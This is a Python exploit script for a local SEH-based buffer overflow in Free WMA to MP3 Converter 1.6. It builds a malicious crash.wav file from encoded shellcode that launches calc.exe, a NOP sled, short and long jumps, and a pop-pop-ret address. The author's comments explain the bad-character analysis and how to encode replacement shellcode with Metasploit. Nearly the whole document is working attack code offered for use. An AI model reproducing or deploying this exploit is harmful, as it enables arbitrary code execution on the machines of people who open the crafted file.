#!/usr/bin/python -w # In the name of allah # Title : Local buffer overflow - SEH # Infected program: [Free WMA to MP3 converter 1.6] # Date: 30/11/2012 # Exploit Author: [R3ZN0V] # Software : [www.eusing.com] # Download Link: [http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm] # OS's: [Windows xp sp3 , Windows 7 64bit sp1 and 32bit] # References : http://www.1337day.com/exploit/17433 #=====================================================================================# # First , i'd like to thank b33f for all his cooperation (always the best man ;) ) . # # i suffered soo much until i made this a work exploit ,as well a few problems with # # badchars analyzing and executing my shellcode , which is inside the memory after # # tracing badchars , if you looked deeply at the path you'll see a weird thing # # is a two byte of 0D will be added automatically like this : # # 09 (0D) 0A 0B 0C (0D) , i've no idea what caused that,first 0D is the problem # # Probably like null-byte , however , go to metasploit and figure this out by badchars# # analyzing , and see try to replace shell to another one using this command : # # msfencode -b '\x00\x0a' , obviously it won't work . # #=====================================================================================# file = "crash.wav" # windows/exec CMD=calc.exe EXITFUNC=seh R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -t c <========= 227 byte iteration=1 =========> shell = ("\xda\xc6\xd9\x74\x24\xf4\x5f\xb8\xc2\x0f\x5e\x65\x33\xc9\xb1" "\x33\x31\x47\x17\x83\xc7\x04\x03\x85\x1c\xbc\x90\xf5\xcb\xc9" "\x5b\x05\x0c\xaa\xd2\xe0\x3d\xf8\x81\x61\x6f\xcc\xc2\x27\x9c" "\xa7\x87\xd3\x17\xc5\x0f\xd4\x90\x60\x76\xdb\x21\x45\xb6\xb7" "\xe2\xc7\x4a\xc5\x36\x28\x72\x06\x4b\x29\xb3\x7a\xa4\x7b\x6c" "\xf1\x17\x6c\x19\x47\xa4\x8d\xcd\xcc\x94\xf5\x68\x12\x60\x4c" "\x72\x42\xd9\xdb\x3c\x7a\x51\x83\x9c\x7b\xb6\xd7\xe1\x32\xb3" "\x2c\x91\xc5\x15\x7d\x5a\xf4\x59\xd2\x65\x39\x54\x2a\xa1\xfd" "\x87\x59\xd9\xfe\x3a\x5a\x1a\x7d\xe1\xef\xbf\x25\x62\x57\x64" "\xd4\xa7\x0e\xef\xda\x0c\x44\xb7\xfe\x93\x89\xc3\xfa\x18\x2c" "\x04\x8b\x5b\x0b\x80\xd0\x38\x32\x91\xbc\xef\x4b\xc1\x18\x4f" "\xee\x89\x8a\x84\x88\xd3\xc0\x5b\x18\x6e\xad\x5c\x22\x71\x9d" "\x34\x13\xfa\x72\x42\xac\x29\x37\xb2\x5d\xe0\xad\x23\xc4\x91" "\x8c\x29\xf7\x4f\xd2\x57\x74\x7a\xaa\xa3\x64\x0f\xaf\xe8\x22" "\xe3\xdd\x61\xc7\x03\x72\x81\xc2\x67\x15\x11\x8e\x49\xb0\x91" "\x35\x96") evil = "\x90" * 11 + shell # don't shrink these nops or the exploit wouldn't work , just in case if you replaced the shellcode junk1 = "\xEB\x06\x90\x90" # jmp 4 byte to far jmp junk2 = "\x56\x23\x40\x00" # pop pop retn Wmpcon.exe Rebase=false , aslr=false , seh=unsafe os=false junk3 = "\xE9\xEA\xEF\xFF\xFF" # jmp back 4108 byte to the beggining of our buffer junk4 = "C"*50 buffer = evil + "\x41"*(4116-len(evil)) + junk1 + junk2 + junk3 + junk4 text = open(file, "w") text.write(buffer) text.close() print "\t\n The file has been created :) "